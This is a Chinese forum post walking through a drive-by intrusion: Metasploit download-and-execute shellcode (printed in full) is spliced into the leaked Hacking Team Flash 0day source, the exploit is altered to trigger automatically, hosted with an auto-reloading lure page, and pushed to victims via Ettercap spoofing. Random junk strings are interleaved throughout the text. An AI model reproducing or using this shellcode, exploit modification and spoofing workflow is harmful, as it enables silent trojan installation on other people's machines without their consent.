flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

& q2 ^ W# m4 t- [. m 三、flash 0day之手工代码修改制作下载者实例入侵演示 ! w% K, q4 }7 E' Z9 ~+ b: E& p7 I

. O$ N. [% h3 V. l4 L9 r 利用到的工具： 4 U& g+ j6 Q/ q4 c4 i" O# w

) `- R7 d1 K# w* ~" K* D. X f Msf ( D( H) Q! A+ X+ C4 U7 ?5 \ r3 n

4 o' T A$ H# j5 u Ettercap 0 v$ e( \" U) o" T9 V- r7 G0 k

) z/ d) ^2 y; Q8 K/ F Adobe Flash CS6 - Q, M" K& Q c4 q

$ T }" O0 E" @1 U9 r Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 [& Z8 J) A) y. N1 j

8 C/ |1 m2 N- D7 [. k) F 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options 2 N; T! ^6 K) m8 S8 H

+ E4 S- U& f3 Z; n, V. d9 D 如图： ' [$ l4 ^( N7 z7 V) z4 B

& a' g1 s# F' W; G + f. |( G5 G+ i- }: v6 |; R7 O

1 w+ j0 ` D# k/ ^; N z : |* \1 P$ q1 i/ A/ p) Z1 r

( S6 Z$ G% k" Q7 l! H. V7 M 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: 4 i. a& Z/ l/ K

/ k. Z2 c1 I& ]; R0 T9 B7 q : n2 f, u8 H; C. ?: }, r

" Z5 |: ?) l: Z g, x ( a7 p$ H4 O$ d. S1 ~3 g `1 _8 q

; |& i" R g- |. V# Y$ N 然后执行generate -t dword生成shellcode，如下： . H( i- W [! G& a- |, ?6 v

- l3 d( L, e& C8 Z" k 0 Y; R* h% J3 w8 b

. j; f& R6 K- p9 F' Q. B 复制代码到文本下便于我们一会编辑flash exp，如下： . T( t- ^2 H6 \, c! _* g

5 z' K1 C3 Q2 t6 m! _ t+ V& F0 m 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 m4 p# W' G ]

: M9 e6 \ }1 F# O$ p 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, - ~& T' r+ d/ g0 e% @ \! j% _

, W& j% P) b0 n" a 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 2 i% K6 v6 z0 h! x- ^0 ^& ?

1 Q. Y( Q; M+ @$ U# ~, a( S 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 k+ u& W7 Y" p: d: J

. M& @' E, y4 V0 p5 q9 u# i j7 [$ }$ ^' r 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, V6 J' Q9 b2 R( Z& I

D8 f" |: t- J* c; r) Z3 a0 D 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & N- o- }6 p3 O' L* q, }

$ n! H7 M8 [% ] 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 w' t% i, \. P; n

1 J2 P* `: {7 n# b& f# \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, % F- U( h. V% \% P/ m$ j

4 K6 X8 T8 W7 `( y# ^ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , C+ u% I+ \! w7 N; C* g9 x* A6 Q! g' b

' y3 _- `; J" ~6 G# Z/ e7 D+ q, R 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # Y) d- j1 p( X+ x5 F( Y4 v8 F

) H/ O7 ~0 i/ E$ z" m* P$ m 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, . R% M+ K0 S; k" J, Q2 A

6 k3 t2 R) _1 n* Z9 Q 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 9 w; T! @4 R) @5 j# ]# m

3 U9 ?4 o+ ^9 Q) g/ Y+ g- k: d: _ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - q5 ^5 o( ]3 `, m0 H4 A$ u! P2 c

" W, b$ g2 U. |( K 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % v! y, w7 y) g! ~4 @: y) W

% V+ z% z0 m+ d4 [2 R5 I6 C 8 M. i% K0 S% s# {2 p5 ~1 X

+ ]: o( p, F: \ & h+ u, ?' B6 t4 w6 M9 O+ _7 a

9 z* L) |$ K2 O0 H6 }1 l& c 下面我们来修改flash 0day exp，需要修改三个文件，分别为： ! F) K- L1 i$ [* y1 E$ O

% d" e" @! S- a* ~3 g8 O1 {& R 6 p3 y$ o; [* H% B w

9 C0 G7 [9 }) I3 f$ ^0 M 先修改ShellWin32.as，部分源代码如图： " |# V. v$ L7 G8 r. ~! l6 L

1 w) M- ?, C2 e; C* a4 f 9 U. F& X' J, N- l9 }7 g) W! [7 e

3 I" q# f8 F# V6 S 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 6 r U% z' ^0 ?# r+ A' n9 N0 I5 b

* ~+ f2 u V1 c; b$ V* o ! p1 g6 P+ D5 c7 n; [

& S( u3 {9 y: C# ?( u 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： ( M: ~( |% Y& d

4 W- H( d5 Q: Y% W! b9 X " G, r7 E8 e: l; V, i

- _+ Q* B" x; _& V 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 4 O- @" A( n* Y; `2 P9 J! ^

2 [5 t3 C6 R- ?& j& | ! s; T, r ~4 T

% n' x$ q( s, @+ [ + H1 m) {, r) `+ M9 w+ K

- i# _' `2 V# p) |3 R$ a ' B7 q: b+ v# x( A- c

# m. C/ m! K/ F5 A$ X 然后点保存，下面我们来编译一下，打开 / A9 w7 k6 K0 J! a# X; M

5 u5 T* Z8 L/ P, X$ w) t. O% B( o exp1.fla然后点文件-发布，看看编译没错误 ' @4 i7 q! h! |2 D* W, [

7 [7 U5 [) Q! {6 b; a' o. E. p$ K ) k& C* _4 N! ^9 W, r$ B8 E3 B) q! n5 f

3 z8 S0 {" ]& i; w9 m 0 |8 E/ ^9 j7 _6 B$ O

/ g& E7 |+ t4 Z. x+ ]0 G 0 W3 P9 i6 A" n, I

! B3 P! g8 I" ~% j 8 J# L3 ?. K6 `8 k6 Y/ w

" k/ o3 A! L: M 然后我们把生成的 : R5 R0 ^9 Q. q1 D3 S

* }, D" D0 Y+ ^$ p6 i exp1.swf丢到kailinux 的/var/www/html下： 4 Y( p) y( B7 Z. P' ?6 V x) Y

" f/ W3 O# ]% q) }8 x. Z 然后把这段代码好好编辑一下 * @; l; q( z& z" N

2 F; o+ N6 m# S: c6 [) K : c# F; b" |0 ?3 ^: X, ^! ^

) [ ]6 @, l% l4 o H8 l* g0 X, V! n& u) [( T, T7 d

: i5 ?, ^: {6 }' j+ _3 D8 v: \ # V2 @" e) y9 f6 |5 R

* |5 I- K% v1 H5 b9 o+ o . ^1 v7 a$ R C

. Z! W* c0 C4 p- d# n0 a- l6 f ( ?: J# j2 l/ w5 Q& @" {' C, h! E

6 s+ W/ d( \3 K6 e E/ K; D: I4 ~6 {

2 K$ j' D7 s' p' j! k <!DOCTYPE html> 6 n5 j' _7 L( k; ~

. g' d9 A- X8 E9 a* v& |( r <html> 7 Q- Y- {1 t/ y9 G

- C9 x1 C! x3 Y8 Y- m8 ?5 { <head> ! }/ X# @9 R" b2 i

L+ `1 x. J8 a3 T4 ~! E8 W/ J; |' S <meta http-equiv="Content-Type" content="text/html; ( Z: Q+ B j$ ^" t

9 ^4 |. b9 R9 w/ J6 Q/ p charset=utf-8"/> # {0 |- O, O! @, z# P0 x

0 `: k }# n# y </head> 6 l3 l5 t$ l2 ^, {3 g

3 J7 s9 F+ f" Y <body> & ?; I% E3 n- T

$ h7 C: x7 r1 E <h2> Please wait, the requested page is loading...</h2> / x4 V' I( n" n; V, V) ?3 W2 n) b

' c6 w1 k" Z# u! p/ n: z <br> % p8 H; k6 b D1 O

2 P. d& N3 f4 a: J# |) J, D <OBJECT n0 _# y, K3 K/ O. U6 K( L

6 J6 W' k8 o/ |% C* F1 z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 4 o5 X0 v( M& W- x& ~; k

% X( D/ C! f z, @4 P V VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ' N/ e, C1 S: {5 `( U, ^1 @ T$ x0 ~2 x

) [+ V: H) B% g </body> + o+ C8 Q$ e y6 J

1 n* v$ ?4 q s# D& \, l <script> 4 m8 _1 o9 `. z0 C+ p& C! E

! {0 r" Y1 K7 n! a2 o4 e setTimeout(function () { $ \! ~1 g6 x$ B

% u' _2 m4 a4 W& u' ] ( Z' m1 [# Z( {" [4 L

Y7 H7 B1 k$ r0 S window.location.reload(); 9 H; B4 L1 A* Q9 M b- R

) J/ e/ [8 Q' c, O }, 10000); 7 {, K# W4 g9 t8 y

% Z, \( `" w7 B8 `* n1 P 2 V# K* X- Q$ W3 [

$ |% L* d2 {, u. ]7 u6 N% D </script> 5 H6 Q2 r" u7 |, D# O& i# X

. H u4 [& F! H+ N </html> 9 x4 f* _- j0 i Z7 s

7 M" H; p2 \& h( W4 [ n& D% P% x, g/ _( ` A, x* W: \4 n+ |

/ m7 w: r* T, M6 r; ^& q 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： & p# ~; V* R& l- f& O: n

r$ d8 e3 ]) y ' X3 V6 ^) p9 [

3 j2 `( L' b# J* B: W' l2 f / u+ ?& }$ P+ |3 G) L

# n/ `5 m% D1 G9 s. N& a- U ' p, b# e# F) w/ s2 s" W1 U

3 A" d- }) s. P( j " i4 L. m* Y. z/ M

* R# r/ o3 F- X% } s t" y3 B 7 B' Q+ S% y: e! F2 p; |) r

( i- ^; P) T9 L; x 下面我们用ettercap欺骗如图： 4 E1 d* X( i# N: i% ~

) \+ t, y- s8 @& F2 N4 ? & n9 q( {2 E/ R# r% w" t9 {) i8 C

% B' Z0 J! W9 Y " R0 W! M! x6 v

; n; }" o! ^3 i4 i 下面我们随便访问个网站看看： 3 H% P" [+ K4 G8 _ O

* J7 i8 x5 l: F 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： Z- ?9 j3 Q1 y7 ~) t2 u1 L

$ F: c6 Q( p5 ^& ]7 |! i 8 \2 O% ~: w# O0 y* f8 N: R+ [

9 b p$ s( N+ v9 P* k$ H6 t. V4 _1 P 我们看另一台， 7 y: a% {1 H7 c! r1 _+ H' J9 M9 Q

/ e; Q9 L- T9 b! P- V 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 % e X8 n! [3 @5 H

		自动登录	找回密码
密码			立即注册